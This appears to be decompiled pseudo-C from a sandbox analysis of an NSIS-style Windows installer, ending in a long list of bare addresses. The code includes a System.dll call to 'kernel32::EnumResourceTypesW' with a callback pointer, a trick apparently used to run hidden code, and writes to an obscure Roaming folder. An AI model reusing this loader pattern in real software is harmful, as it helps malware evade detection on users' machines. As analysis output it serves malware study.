						__eax = E00406408(__edi,  *((intOrPtr*)(__esi + 0x14)));
						_push( *(__esi + 0x18));
						goto L21;
					case 0x28:
						__eax = E00402E92(__edx, 0xffffffee);
						__ecx = __esp + 0x54;
						 *(__esp + 0x44) = __eax;
						_push(__esp + 0x54);
						_push(__eax);
						__eax = E004066E5(0xb);
						__ecx = __eax;
						 *__ebp = __bl;
						__eax = 0;
						 *(__esp + 0x1c) = __ecx;
						__eax = 1;
						 *__edi = __bl;
						 *(__esp + 0x10) = 1;
						__eflags = __ecx;
						if(__ecx == 0) {
							goto L378;
						}
						__eax = GlobalAlloc(0x40, __ecx);
						 *(__esp + 0x14) = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							goto L377;
						}
						__esi = E004066E5(0xc);
						__eax = E004066E5(0xd);
						_push( *(__esp + 0x14));
						 *(__esp + 0x4c) = __eax;
						_push( *(__esp + 0x20));
						_push(0);
						_push( *(__esp + 0x50));
						__eax =  *__esi();
						__eflags = __eax;
						if(__eax != 0) {
							__eax = __esp + 0x40;
							_push(__esp + 0x40);
							__eax = __esp + 0x1c;
							_push(__esp + 0x1c);
							_push(0x408298);
							_push( *(__esp + 0x20));
							__eax =  *(__esp + 0x58)();
							__eflags = __eax;
							if(__eax != 0) {
								__ecx =  *(__esp + 0x18);
								 *(__esp + 0x34) = E00406408(__ebp, ( *(__esp + 0x18))[8 +  *(__esp + 0x34) * 4]);
								__ecx =  *(__esp + 0x34);
								 *(__esp + 0x18) = E00406408(__edi, ( *(__esp + 0x18))[0xc +  *(__esp + 0x34) * 4]);
								 *(__esp + 0x10) = 0;
							}
						}
						__eax = GlobalFree( *(__esp + 0x14));
						L161:
						goto L377;
					case 0x29:
						__ebp = 0;
						__ebp = 1;
						 *(__esp + 0x10) = 1;
						__eflags =  *0x424060;
						if( *0x424060 < 0) {
							_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
							_push(0xffffffe7);
							goto L11;
						}
						__esi = E00402E92(__edx, 0xfffffff0);
						 *(__esp + 0x4c) = __esi;
						__edi = E00402E92(__edx, 1);
						 *(__esp + 0x44) = __edi;
						__eflags =  *(__esp + 0x38);
						if( *(__esp + 0x38) == 0) {
							L218:
							__eax = LoadLibraryExA(__esi, __ebx, 8); // executed
							__esi = __eax;
							__eflags = __esi;
							if(__esi == 0) {
								_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
								_push(0xfffffff6);
								goto L11;
							}
							L219:
							__edi = GetProcAddress(__esi, __edi);
							__eflags = __edi;
							if(__edi == 0) {
								_push( *(__esp + 0x44));
								_push(0xfffffff7);
								__eax = E00405BA4();
								L225:
								__eax =  *(__esp + 0x10);
								L226:
								__eflags =  *(__esp + 0x34) - __ebx;
								if( *(__esp + 0x34) != __ebx) {
									goto L378;
								}
								__eax = E00403C08(__esi);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = FreeLibrary(__esi);
								}
								goto L377;
							}
							 *(__esp + 0x10) = __ebx;
							__eflags =  *(__esp + 0x30) - __ebx;
							if( *(__esp + 0x30) == __ebx) {
								__eax =  *(__esp + 0x14);
								_push(0x40a000);
								_push(0x40a0e0);
								_push("kernel32::EnumResourceTypesW(i 0,i r1,i 0)");
								_push(0x400);
								_push(__eax);
								__eax =  *__edi();
								__esp = __esp + 0x14;
								goto L225;
							}
							_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
							_push( *(__esp + 0x34));
							__eax = E00405BA4();
							__eax =  *__edi();
							__eflags = __eax;
							if(__eax == 0) {
								goto L225;
							}
							__eax = __ebp;
							 *(__esp + 0x10) = __ebp;
							goto L226;
						}
						__eax = GetModuleHandleA(__esi); // executed
						__esi = __eax;
						__eflags = __esi;
						if(__esi != 0) {
							goto L219;
						}
						__esi =  *(__esp + 0x48);
						goto L218;
					case 0x2a:
						 *(__esp + 0x58) = E00402E92(__edx, 0xfffffff0);
						__esi = E00402E92(__edx, 0xffffffdf);
						 *(__esp + 0x50) = E00402E92(__edx, 2);
						 *(__esp + 0x20) = E00402E92(__edx, 0xffffffcd);
						 *(__esp + 0x40) = E00402E92(__edx, 0x45);
						__eax =  *(__esp + 0x38);
						__eax = __eax & 0x00000fff;
						__edi = __eax;
						 *(__esp + 0x50) = __eax & 0x00000fff;
						__ecx = __eax;
						__ecx = __eax & 0x00008000;
						__eax = __eax >> 0x10;
						__edi = __edi >> 0xc;
						 *(__esp + 0x4c) = __ecx;
						__edi = __edi & 0x00000007;
						 *(__esp + 0x48) = __eax;
						__eax = E00406B9E(__esi);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E00402E92(__edx, 0x21);
						}
						__eax = __esp + 0x14;
						__ebp = 0;
						_push(__eax);
						_push(0x408738);
						__ebp = 1;
						_push(1);
						_push(__ebx);
						_push(0x408758);
						__imp__CoCreateInstance();
						 *(__esp + 0x10) = __eax;
						__eflags = __eax;
						if(__eax >= 0) {
							__eax =  *(__esp + 0x14);
							__edx = __esp + 0x18;
							_push(__esp + 0x18);
							_push(0x408748);
							_push(__eax);
							__ecx =  *__eax;
							__eax =  *( *__eax)();
							 *(__esp + 0x10) = __eax;
							__eflags = __eax;
							if(__eax >= 0) {
								__eax =  *(__esp + 0x14);
								_push(__esi);
								_push(__eax);
								__ecx =  *__eax;
								 *(__esp + 0x10) = __eax;
								__eflags =  *(__esp + 0x48) - __ebx;
								if( *(__esp + 0x48) == __ebx) {
									__eax =  *(__esp + 0x14);
									_push("C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne\\Vrvleversenes\\lsernes\\Volantly");
									_push(__eax);
									__ecx =  *__eax;
									__eax =  *((intOrPtr*)( *__eax + 0x24))();
								}
								__eflags = __edi;
								if(__edi != 0) {
									__eax =  *(__esp + 0x14);
									_push(__edi);
									_push(__eax);
									__ecx =  *__eax;
									__eax =  *((intOrPtr*)( *__eax + 0x3c))();
								}
								__eax =  *(__esp + 0x14);
								_push( *(__esp + 0x44));
								_push(__eax);
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 0x34))();
								__edx =  *(__esp + 0x1c);
								__eflags = __edx->i - __bl;
								if(__edx->i != __bl) {
									__eax =  *(__esp + 0x14);
									_push( *(__esp + 0x50));
									_push(__edx);
									__ecx =  *__eax;
									_push(__eax);
									__eax =  *((intOrPtr*)( *__eax + 0x44))();
								}
								__eax =  *(__esp + 0x14);
								_push( *(__esp + 0x4c));
								_push(__eax);
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 0x2c))();
								__eax =  *(__esp + 0x14);
								_push( *(__esp + 0x40));
								_push(__eax);
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 0x1c))();
								__eflags =  *(__esp + 0x10) - __ebx;
								if( *(__esp + 0x10) >= __ebx) {
									 *(__esp + 0x20) = 0x80004005;
									__eax = MultiByteToWideChar(__ebx, __ebx,  *(__esp + 0x60), 0xffffffff, __esi, 0x400);
									__eflags = __eax;
									if(__eax != 0) {
										__eax =  *(__esp + 0x18);
										_push(__ebp);
										_push(__esi);
										_push(__eax);
										__ecx =  *__eax;
										 *(__esp + 0x10) = __eax;
									}
								}
								__eax =  *(__esp + 0x18);
								_push(__eax);
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))();
							}
							__eax =  *(__esp + 0x14);
							_push(__eax);
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))();
							__eax =  *(__esp + 0x10);
						}
						__eax = __eax >> 0x1f;
						__eax = __eax & 0xfffffffc;
						_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
						_push(__eax);
						E00405BA4() =  *(__esp + 0x10);
						__eax =  *(__esp + 0x10) >> 0x1f;
						goto L378;
					case 0x2b:
						__esi = E00402E92(__edx, 0);
						__edi = E00402E92(__edx, 0x11);
						__ebp = E00402E92(__edx, 0x23);
						__eax = E004063BD(__esi);
						__eflags = __eax;
						if(__eax != 0) {
							__eax =  *(__esp + 0x14);
							 *(__esp + 0x58) =  *(__esp + 0x14);
							 *(__esp + 0x5c) = 2;
							 *(__esi + 1 + lstrlenA(__esi)) = __bl;
							__eax = lstrlenA(__edi);
							_push(__ebp);
							_push(0);
							__eax[__edi + 1] = __bl;
							__ax =  *(__esp + 0x38);
							 *(__esp + 0x64) = __esi;
							 *(__esp + 0x68) = __edi;
							 *(__esp + 0x76) = __ebp;
							 *(__esp + 0x6c) =  *(__esp + 0x38);
							E00405BA4() = __esp + 0x54;
							__eax = SHFileOperationA(__esp + 0x54);
							__eflags = __eax;
							if(__eax == 0) {
								goto L377;
							}
						}
						_push(__ebx);
						_push(0xfffffff9);
						__eax = E00405BA4();
						goto L29;
					case 0x2c:
						__eflags = __esi - 0xbadf00d;
						if(__esi != 0xbadf00d) {
							L157:
							_push(0x200010);
							_push(0xffffffe8);
							_push(__ebx);
							_push(E00405D47());
							L90:
							__eax = E00406898();
							L5:
							__eax = 0x7fffffff;
							return 0x7fffffff;
						}
						 *0x4240d4 =  *0x4240d4 + 1;
						goto L377;
					case 0x2d:
						__edi = 0;
						__ebp = 0;
						__eflags = __esi;
						if(__esi != 0) {
							__eax = E00402E92(__edx, 0);
							__ecx =  *(__esp + 0x2c);
							__ebx = __eax;
						}
						__eflags = __ecx;
						if(__ecx != 0) {
							__edi = E00402E92(__edx, 0x11);
						}
						__eflags =  *(__esp + 0x38) - __ebp;
						if( *(__esp + 0x38) != __ebp) {
							__ebp = E00402E92(__edx, 0x22);
						}
						__eax = E00402E92(__edx, 0xffffffcd);
						__eax = WritePrivateProfileStringA(__ebx, __edi, __ebp, __eax);
						L28:
						__eflags = __eax;
						if(__eax != 0) {
							goto L377;
						}
						goto L29;
					case 0x2e:
						_push(0xa);
						_pop(__eax);
						 *(__esp + 0x18) = __ax;
						__edi = E00402E92(__edx, "true");
						__esi = E00402E92(__edx, 0x12);
						E00402E92(__edx, 0xffffffdd) = __esp + 0x20;
						__eax = GetPrivateProfileStringA(__edi, __esi, __esp + 0x20, __ebp, 0x3ff, __esp + 0x20); // executed
						__eflags =  *__ebp - 0xa;
						if( *__ebp != 0xa) {
							goto L377;
						}
						__esi = 0;
						__eax = 1;
						goto L62;
					case 0x2f:
						__esi = 0;
						__esi = 1;
						__eflags =  *(__esp + 0x38);
						if(__eflags != 0) {
							__eax = E00402E92(__edx, 0x22);
							__ecx =  *(__esp + 0x38);
							__esi = __eax;
							__ecx =  *(__esp + 0x38) >> 1;
							__eflags =  *__esi - __bl;
							if( *__esi != __bl) {
								__eax = __esp + 0x18;
								 *(__esp + 0x20) = __ecx;
								__eax = E00402E77( *(__esp + 0x58));
								__eflags = __eax;
								if(__eflags == 0) {
									_push(6);
									_pop(__esi);
								} else {
									__esi = __eax;
								}
							} else {
								__esi = 0x3eb;
							}
						} else {
							__eax = E00402ED0(__ecx, __edx, __eflags, 2); // executed
							__edi = __eax;
							__eflags = __edi;
							if(__edi != 0) {
								__eax = E00402E92(__edx, 0x33);
								__esi = __eax;
								__eax = RegCloseKey(__edi);
							}
						}
						__eax = 0;
						__eflags = __esi;
						__eax = 0 | __esi != 0x00000000;
						goto L378;
					case 0x30:
						__eax =  *(__esp + 0x38);
						 *(__esp + 0x40) =  *(__esp + 0x38);
						__eax =  *(__esp + 0x3c);
						 *(__esp + 0x50) =  *(__esp + 0x3c);
						 *(__esp + 0x54) = E00402E92(__edx, 2);
						__eax = E00402E92(__edx, 0x11);
						__ecx = __esp + 0x54;
						0 = 1;
						 *(__esp + 0x20) = 1;
						__eax = E00402E77(__esi);
						__eax = E00406117(__eflags, __eax, __eax, 0x100022, __esp + 0x54); // executed
						__edi =  *(__esp + 0x54);
						__ecx = 0;
						__eflags = __eax;
						__edi =  !=  ? 0 :  *(__esp + 0x54);
						__eflags = __edi;
						if(__edi == 0) {
							goto L377;
						}
						__eax =  *(__esp + 0x40);
						__esi = 0x40a8e8;
						__eflags = __eax - 1;
						if(__eax != 1) {
							_push(4);
							_pop(__ebp);
							__eflags = __eax - 1;
							if(__eax != 1) {
								__ebp = 0;
								__eflags = __eax - 3;
								if(__eax == 3) {
									0 = E004030D6(0,  *(__esp + 0x40), 0, 0x40a8e8, 0xc00);
								}
							} else {
								 *0x40a8e8 = E00402E56(3);
							}
						} else {
							__eax = E00402E92(__edx, 0x23);
							0 = 1 + lstrlenA(0x40a8e8);
						}
						__eax = RegSetValueExA(__edi,  *(__esp + 0x60), __ebx,  *(__esp + 0x54), __esi, __ebp); // executed
						__eax =  ~__eax;
						_push(__edi);
						asm("sbb eax, eax");
						_t300 = __esp + 0x14; // executed
						 *_t300 =  *(__esp + 0x14) & __eax;
						__eflags =  *_t300;
						goto L279;
					case 0x31:
						__eax = E00402ED0(__ecx, __edx, __eflags, 0x20019); // executed
						__esi = __eax;
						__eax = E00402E92(__edx, 0x33);
						 *__ebp = __bl;
						__eflags = __esi;
						if(__esi == 0) {
							goto L29;
						}
						__ecx = __esp + 0x54;
						 *(__esp + 0x54) = 0x400;
						__ecx = __esp + 0x1c;
						__eax = RegQueryValueExA(__esi, __eax, 0, __esp + 0x1c, __ebp, __esp + 0x54);
						__ecx = 0;
						__ecx = 1;
						__eflags = __eax;
						if(__eax != 0) {
							L288:
							 *__ebp = __bl;
							 *(__esp + 0x10) = __ecx;
							goto L289;
						}
						__eflags =  *(__esp + 0x14) - 4;
						if( *(__esp + 0x14) == 4) {
							__eax = 0;
							__eflags =  *(__esp + 0x3c);
							__eax = 0 | __eflags == 0x00000000;
							 *(__esp + 0x18) = __eflags == 0;
							__eax = E00406408(__ebp,  *__ebp);
							goto L289;
						}
						__eflags =  *(__esp + 0x14) - 1;
						if( *(__esp + 0x14) == 1) {
							L285:
							__eax =  *(__esp + 0x38);
							 *(__esp + 0x10) =  *(__esp + 0x38);
							goto L286;
						}
						__eflags =  *(__esp + 0x14) - 2;
						if( *(__esp + 0x14) != 2) {
							goto L288;
						}
						goto L285;
					case 0x32:
						__eax = E00402ED0(__ecx, __edx, __eflags, 0x20019); // executed
						__esi = __eax;
						__eax = E00402E56(3);
						 *__ebp = __bl;
						__eflags = __esi;
						if(__esi == 0) {
							goto L29;
						}
						__ecx = 0x3ff;
						 *(__esp + 0x54) = 0x3ff;
						__eflags =  *(__esp + 0x38);
						if( *(__esp + 0x38) == 0) {
							__ecx = __esp + 0x64;
							__eax = RegEnumValueA(__esi, __eax, __ebp, __esp + 0x64, 0, 0, 0, 0);
							__ecx =  *(__esp + 0x10);
							0 = 1;
							__eflags = __eax;
							__ecx =  !=  ? 1 :  *(__esp + 0x10);
							 *(__esp + 0x10) =  !=  ? 1 :  *(__esp + 0x10);
						} else {
							__eax = RegEnumKeyA(__esi, __eax, __ebp, 0x3ff);
						}
						L286:
						__ebp[0x3ff] = __bl;
						L289:
						_push(__esi);
						L279:
						__eax = RegCloseKey(); // executed
						goto L377;
					case 0x33:
						_push(__ebp);
						__eax = E00406A20(__ecx);
						__eflags = __eax;
						if(__eax == 0) {
							goto L377;
						}
						__eax = CloseHandle(__eax);
						L198:
						goto L377;
					case 0x34:
						__eax = E00402E92(__edx, 0xffffffed);
						__eax = E0040671A(__eax,  *(__esp + 0x30),  *(__esp + 0x30));
						__eflags = __eax - 0xffffffff;
						if(__eax != 0xffffffff) {
							L99:
							_push(__eax);
							L21:
							_push(__ebp);
							goto L22;
						}
						goto L297;
					case 0x35:
						__ebx = 0;
						__ebx = 1;
						__eflags =  *(__esp + 0x30);
						if( *(__esp + 0x30) == 0) {
							__eax = E00402E92(__edx, 0x11);
							__esi = __eax;
						} else {
							__eax = E00402E56(1);
							 *0x40a4e8 = __al;
							__esi = 1;
						}
						__eflags =  *__ebp;
						if( *__ebp == 0) {
							L303:
							__eax = __ebx;
							goto L378;
						} else {
							_push(__ebp);
							__eax = E00406A20(__ecx);
							__eax = E00406806(__ecx, __eax, "C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll", __esi);
							__eflags = __eax;
							if(__eax != 0) {
								goto L377;
							}
							goto L303;
						}
					case 0x36:
						 *(__esp + 0x1c) = 0;
						__eax = E00402E56(2);
						__esi = 0;
						__esi = 1;
						__eflags = __eax - 1;
						if(__eax < 1) {
							goto L377;
						}
						__ecx = 0x3ff;
						__eflags = __eax - 0x3ff;
						 *(__esp + 0x10) = __eax;
						__eflags =  *__ebp - __bl;
						if( *__ebp == __bl) {
							L314:
							__ecx =  *(__esp + 0x18);
							__eax = 0;
							__eflags = __ecx;
							 *(__edi + __ecx) = __bl;
							L81:
							__eax = __eax & 0xffffff00 | __eflags == 0x00000000;
							goto L378;
						}
						_push(__ebp);
						 *(__esp + 0x18) = __bl;
						 *(__esp + 0x1c) = E00406A20(0x3ff);
						__eflags =  *(__esp + 0x10);
						if( *(__esp + 0x10) <= 0) {
							goto L314;
						}
						__ebp = 0;
						while(1) {
							__ecx = __esp + 0x27;
							__eax = E00406747(__esp + 0x27, __eax, __esp + 0x27, __esi); // executed
							__eflags = __eax;
							if(__eax == 0) {
								goto L314;
							}
							__eflags =  *(__esp + 0x34) - __ebx;
							if( *(__esp + 0x34) != __ebx) {
								 *(__esp + 0x23) & 0x000000ff = E00406408(__edi,  *(__esp + 0x23) & 0x000000ff);
								goto L379;
							}
							__al =  *(__esp + 0x14);
							__eflags = __al - 0xd;
							if(__al == 0xd) {
								L315:
								__cl =  *(__esp + 0x23);
								__eflags = __al - __cl;
								if(__al == __cl) {
									L319:
									__eax = SetFilePointer( *(__esp + 0x28), 0xffffffff, __ebx, __esi);
									goto L314;
								}
								__eflags = __cl - 0xd;
								if(__cl == 0xd) {
									L318:
									 *(__edi + __ebp) = __cl;
									 *(__esp + 0x18) = 0;
									goto L314;
								}
								__eflags = __cl - 0xa;
								if(__cl != 0xa) {
									goto L319;
								}
								goto L318;
							}
							__eflags = __al - 0xa;
							if(__al == 0xa) {
								goto L315;
							}
							__al =  *(__esp + 0x23);
							 *(__edi + __ebp) = __al;
							__ebp =  &(__ebp[1]);
							 *(__esp + 0x14) = __al;
							 *(__esp + 0x18) = __ebp;
							__eflags = __al;
							if(__al == 0) {
								goto L314;
							}
							__eax =  *(__esp + 0x1c);
							__eflags = __ebp -  *(__esp + 0x10);
							if(__ebp <  *(__esp + 0x10)) {
								continue;
							}
							goto L314;
						}
						goto L314;
					case 0x37:
						__eflags =  *__ebp - __bl;
						if( *__ebp == __bl) {
							goto L377;
						}
						__eax = E00402E56(2);
						_push( *(__esp + 0x34));
						__eax = E00406A20(__ecx);
						__eax = SetFilePointer(__eax, __ebp, __eax, 0); // executed
						__eflags =  *(__esp + 0x2c);
						if( *(__esp + 0x2c) < 0) {
							goto L377;
						}
						goto L323;
					case 0x38:
						_push(__ebp);
						__eax = E00406A20(__ecx);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = FindClose(__eax);
						}
						goto L377;
					case 0x39:
						_push(__edi);
						__eax = E00406A20(__ecx);
						__eflags = __eax;
						if(__eax == 0) {
							L61:
							0 = 1;
							__eflags = 1;
							L62:
							 *__ebp = __bl;
							goto L378;
						}
						__ecx = __esp + 0x90;
						__eax = FindNextFileA(__eax, __esp + 0x90);
						__eflags = __eax;
						if(__eax == 0) {
							goto L61;
						}
						goto L329;
					case 0x3a:
						__eax = E00402E92(__edx, 2);
						__ecx = __esp + 0x90;
						__eax = FindFirstFileA(__eax, __esp + 0x90);
						__eflags = __eax - 0xffffffff;
						if(__eax != 0xffffffff) {
							__eax = E00406408(__edi, __eax);
							L329:
							__eax = __esp + 0xbc;
							_push(__esp + 0xbc);
							_push(__ebp);
							goto L156;
						}
						 *__edi = __bl;
						L297:
						 *__ebp = __bl;
						goto L29;
					case 0x3b:
						 *(__esp + 0x20) = 0xfffffd66;
						0 = E00402E92(__edx, 0xfffffff0);
						 *(__esp + 0x58) = __ebp;
						__eax = E00406B9E(__ebp);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E00402E92(__edx, 0xffffffed);
						}
						__eax = E0040698D(__ebp);
						__edi = E0040671A(__ebp, 0x40000000, 2);
						 *(__esp + 0x4c) = __edi;
						__eflags = __edi - 0xffffffff;
						if(__edi == 0xffffffff) {
							L347:
							_push(0xfffffff3);
							_pop(__esi);
							__eflags =  *(__esp + 0x1c) - __ebx;
							if( *(__esp + 0x1c) < __ebx) {
								_push(0xffffffef);
								_pop(__esi);
								__eax = DeleteFileA(__ebp);
								 *(__esp + 0x10) = 1;
							}
							_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
							L10:
							_push(__esi);
							L11:
							__eax = E00405BA4();
							goto L377;
						} else {
							__eax =  *(__esp + 0x2c);
							 *(__esp + 0x40) =  *(__esp + 0x2c);
							__eflags =  *(__esp + 0x30) - __ebx;
							if( *(__esp + 0x30) == __ebx) {
								L346:
								 *(__esp + 0x20) = __eax;
								__eax = CloseHandle(__edi);
								goto L347;
							}
							__eax =  *0x424008;
							 *(__esp + 0x20) = __eax;
							__esi = __eax;
							 *(__esp + 0x1c) = __esi;
							__eflags = __esi;
							if(__esi == 0) {
								__eax =  *(__esp + 0x40);
								goto L346;
							}
							E00402F40(__ebx) = E00402F2A(__esi,  *(__esp + 0x18));
							__edi = GlobalAlloc(0x40,  *(__esp + 0x30));
							 *(__esp + 0x40) = __edi;
							__eflags = __edi;
							if(__edi == 0) {
								L344:
								__edi =  *(__esp + 0x50);
								__eax = E00406806(__ecx, __edi, __esi,  *(__esp + 0x18));
								GlobalFree(__esi) = __eax | 0xffffffff;
								goto L346;
							}
							__eax = E004030D6(__ecx,  *(__esp + 0x38), __ebx, __edi,  *(__esp + 0x30));
							__eflags =  *__edi - __bl;
							if( *__edi == __bl) {
								L343:
								__eax = GlobalFree( *(__esp + 0x40));
								goto L344;
							}
							__ebp = __esi;
							do {
								__esi =  *__edi;
								__eax =  *(__edi + 4);
								__edi = __edi + 8;
								__eax = E00406498(__eax, __edi, __esi);
								__edi = __edi + __esi;
								__eflags =  *__edi - __bl;
							} while ( *__edi != __bl);
							__ebp =  *(__esp + 0x54);
							__esi =  *(__esp + 0x1c);
							goto L343;
						}
					case 0x3c:
						__eax = E00402E56(0);
						__ebx = __eax;
						__eflags = __ebx -  *0x42402c;
						if(__ebx >=  *0x42402c) {
							goto L29;
						}
						__ecx =  *(__esp + 0x30);
						__esi = __ebx * 0x418;
						__esi = __ebx * 0x418 +  *0x424028;
						__eflags = __ecx;
						if(__eflags < 0) {
							__eax = __eax | 0xffffffff;
							__eax = __eax - __ecx;
							__eflags = __eax;
							 *(__esp + 0x30) = __eax;
							if(__eax == 0) {
								_push( *(__esp + 0x38));
								__eax = __esi + 0x18;
								_push(__esi + 0x18);
								__eax = E00405D47();
								_t381 = __esi + 8;
								 *_t381 =  *(__esi + 8) | 0x00000100;
								__eflags =  *_t381;
								__ecx =  *(__esp + 0x2c);
							} else {
								__ecx = E00402E56("true");
								 *(__esp + 0x2c) = __ecx;
							}
							__eax =  *(__esp + 0x30);
							 *(__esi +  *(__esp + 0x30) * 4) = __ecx;
							__eflags =  *(__esp + 0x34);
							if( *(__esp + 0x34) != 0) {
								__eax = E00401221(__ebx);
							}
							goto L377;
						}
						__eax =  *(__esi + __ecx * 4);
						if(__eflags != 0) {
							goto L323;
						}
						__eax = __esi + 0x18;
						_push(__esi + 0x18);
						_push(__edi);
						L156:
						__eax = E0040690A();
						goto L377;
					case 0x3d:
						0 = E00402E56(0);
						__eflags = __edx - 0x20;
						if(__edx >= 0x20) {
							L29:
							0 = 1;
							goto L378;
						}
						__eflags =  *(__esp + 0x34);
						if( *(__esp + 0x34) == 0) {
							__eax =  *0x424010;
							__eflags =  *(__esp + 0x30);
							if( *(__esp + 0x30) == 0) {
								_push(__eax[0x94 + __edx * 4]);
								_push(__edi);
								__eax = E00405D47();
							} else {
								__ecx =  *(__esp + 0x2c);
								__eax[0x94 + __edx * 4] =  *(__esp + 0x2c);
							}
							goto L377;
						}
						__eflags =  *(__esp + 0x30);
						if( *(__esp + 0x30) == 0) {
							__eax = E004011A0(0);
							L323:
							_push(__eax);
							goto L324;
						}
						E00401290(__edx) = E004012DD(0, 0);
						goto L377;
					case 0x3e:
						__eax =  *(__esp + 0x34);
						__eax =  *(__esp + 0x34);
						__eflags = __eax;
						if(__eax == 0) {
							__esi = E004066E5(5);
							__eax = E00402E92(__edx, 0x22);
							__eflags = __esi;
							if(__esi == 0) {
								L374:
								__eax = 0;
								 *__edi = __bl;
								__eax = 1;
								goto L378;
							}
							__ecx = __esp + 0x54;
							__eax = E00405C89(__eax, __esp + 0x54);
							_pop(__ecx);
							_pop(__ecx);
							__eflags = __eax;
							if(__eax < 0) {
								goto L374;
							}
							__eax = __esp + 0x1c;
							_push(__esp + 0x1c);
							_push(0);
							_push( *(__esp + 0x3c));
							__eax = __esp + 0x60;
							_push(__esp + 0x60);
							__eax =  *__esi();
							__eflags = __eax;
							if(__eax < 0) {
								goto L374;
							}
							__eax = E00406A0A(__edi,  *(__esp + 0x1c));
							_pop(__ecx);
							_pop(__ecx);
							_push( *(__esp + 0x1c));
							__imp__CoTaskMemFree();
							goto L377;
						}
						__eax = __eax - 1;
						__eflags = __eax;
						if(__eax != 0) {
							goto L377;
						}
						__esi = E00402E56(2);
						__eax = E00402E56(4);
						__edx = __al & 0x000000ff;
						__eax = __eax >> 0x18;
						__ecx = 0x4240c0;
						__eflags = __esi;
						 *(__esp + 0x1c) = 0;
						__ecx =  !=  ? __esi : 0x4240c0;
						__esp + 0x24 = E00406498(__esp + 0x24, __esp + 0x24, __al & 0x000000ff);
						_push( *(__esp + 0x1c));
						L324:
						_push(__edi);
						L22:
						__eax = E00406408();
						goto L377;
					case 0x3f:
						goto L377;
					case 0x40:
						 *0x41f5d8 =  *0x41f5d8 & __esi;
						__eax = SendMessageA(__edx, 0xb,  *0x41f5d8 & __esi, 0);
						__eflags =  *(__esp + 0x28);
						if( *(__esp + 0x28) != 0) {
							 *(__esp + 0x14) = InvalidateRect( *(__esp + 0x14), 0, 0);
						}
						goto L377;
				}
			}










                                                                                                                                                                                            0x00401551
                                                                                                                                                                                            0x0040156a
                                                                                                                                                                                            0x0040156f
                                                                                                                                                                                            0x00401573
                                                                                                                                                                                            0x00401573
                                                                                                                                                                                            0x0040157b
                                                                                                                                                                                            0x0040158b
                                                                                                                                                                                            0x00401593
                                                                                                                                                                                            0x00401597
                                                                                                                                                                                            0x004015a0
                                                                                                                                                                                            0x004015a6
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d06
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402d06
                                                                                                                                                                                            0x004015ac
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004015ba
                                                                                                                                                                                            0x004015bb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004015cb
                                                                                                                                                                                            0x004015d1
                                                                                                                                                                                            0x004015d3
                                                                                                                                                                                            0x004015d6
                                                                                                                                                                                            0x004015d6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004015e4
                                                                                                                                                                                            0x004015e5
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004015f1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004015fe
                                                                                                                                                                                            0x00401606
                                                                                                                                                                                            0x00401607
                                                                                                                                                                                            0x00401609
                                                                                                                                                                                            0x0040160d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00401619
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004016a6
                                                                                                                                                                                            0x004016ab
                                                                                                                                                                                            0x004016b1
                                                                                                                                                                                            0x004016b3
                                                                                                                                                                                            0x004016b7
                                                                                                                                                                                            0x004016b9
                                                                                                                                                                                            0x004016b9
                                                                                                                                                                                            0x004016bd
                                                                                                                                                                                            0x004016c2
                                                                                                                                                                                            0x004016c4
                                                                                                                                                                                            0x004016cc
                                                                                                                                                                                            0x004016cc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004016d5
                                                                                                                                                                                            0x004016df
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004016fc
                                                                                                                                                                                            0x00401704
                                                                                                                                                                                            0x00401706
                                                                                                                                                                                            0x00401708
                                                                                                                                                                                            0x00401762
                                                                                                                                                                                            0x00401762
                                                                                                                                                                                            0x00401767
                                                                                                                                                                                            0x0040176b
                                                                                                                                                                                            0x00401798
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040176d
                                                                                                                                                                                            0x0040176d
                                                                                                                                                                                            0x0040177a
                                                                                                                                                                                            0x00401780
                                                                                                                                                                                            0x00401786
                                                                                                                                                                                            0x00401788
                                                                                                                                                                                            0x0040178c
                                                                                                                                                                                            0x00401792
                                                                                                                                                                                            0x00401792
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040178c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040170a
                                                                                                                                                                                            0x0040170a
                                                                                                                                                                                            0x00401712
                                                                                                                                                                                            0x00401714
                                                                                                                                                                                            0x00401716
                                                                                                                                                                                            0x0040171a
                                                                                                                                                                                            0x0040171c
                                                                                                                                                                                            0x0040171e
